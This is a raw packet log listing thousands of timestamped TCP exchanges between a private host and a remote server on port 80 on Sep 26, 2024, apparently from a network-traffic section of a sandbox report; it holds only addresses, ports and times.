Sep 26, 2024 00:39:11.620781898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620822906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620834112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620886087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620897055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620933056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620944023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620954037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.620961905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620974064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.620974064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620987892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621040106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621040106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621145010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621156931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621166945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621176958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621186972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621196985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621212959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621217012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621217012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621227026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621243954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621254921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621257067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621257067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621264935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621277094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621287107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621303082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621310949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621321917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621331930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621340990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621347904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621352911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621398926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621398926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621506929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621519089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621530056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621541023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621551037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621560097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621562958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621575117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621583939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621594906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621596098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621596098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621613026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621624947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621651888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621651888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621661901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621678114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621689081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621694088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621694088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621699095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621710062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621718884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621721983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621740103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621748924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621759892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621763945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621763945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621789932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621815920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621826887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621829033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621838093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621855974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621867895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621870995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621879101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621891022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621907949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621912003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621912003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621920109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.621954918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.621969938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622001886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622014046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622024059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622034073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622045040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622075081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622075081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622114897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622123003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622128010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622139931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622180939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622180939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622211933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622225046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622235060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622246027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622256041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622266054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622270107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622282028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.622298956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622313023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.622328997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744378090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744528055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744539022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744549036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744560957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744577885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744577885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744671106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744694948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744704962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744716883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744728088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744745016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744749069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744756937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744770050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744780064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744790077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744801998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744812012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744817972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744817972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744822979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744834900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744847059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744853020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744853020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744877100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744879007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744888067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744920969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744920969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744936943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744949102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.744975090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.744987965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745008945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745019913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745029926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745040894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745069027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745069027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745182037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745219946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745229959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745269060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745269060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745276928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745332003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745342970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745345116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745368958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745381117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745388985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745388985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745392084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745403051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745429039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745429039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745464087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745475054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745486975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745496988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745507002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745517969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745552063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745618105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745629072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745640039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745650053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745659113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745670080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745680094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745690107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745692015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745692015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745769024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745780945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745789051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745793104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745804071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745814085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745822906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745831966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745840073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745840073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745845079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745891094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745891094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745920897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745932102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745942116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745951891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745963097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745971918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.745990992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745990992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.745995998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746007919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746010065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746020079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746062040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746062040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746093035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746119976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746130943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746131897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746160984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746162891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746175051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746186972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746201038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746234894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746234894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746248007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746320009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746320009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746331930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746341944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746352911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746362925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746380091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746390104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746396065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746402025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746448040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746448040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746500015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746511936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746520996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746531963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746531963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746542931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746552944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.746579885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.746640921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.868503094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868525028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868545055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868556023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868557930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.868566990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868581057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868585110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.868594885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.868626118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868633986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.868640900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868653059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868664980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.868694067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.868983984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.868997097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869008064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869019032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869024992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869033098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869043112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869044065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869054079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869066000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869076014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869081020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869093895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869096041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869112015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869119883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869123936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869136095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869143963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869148016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869159937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869170904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869173050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869180918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869195938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869210958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869239092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869263887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869276047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869285107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869294882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869304895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869304895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869317055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869327068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869327068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869345903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869357109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869358063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869370937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869393110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869401932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869405031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869416952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869431973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869460106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869483948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869496107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869507074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869518042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869524002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869530916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869565010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869592905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869616032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869626045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869636059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869647026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869657040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869657993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869678020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869683027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869693995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869699955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869707108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869730949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869750023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869759083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869762897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869775057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.869788885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.869817972 CEST	49730	80	192.168.2.4	185.215.113.37
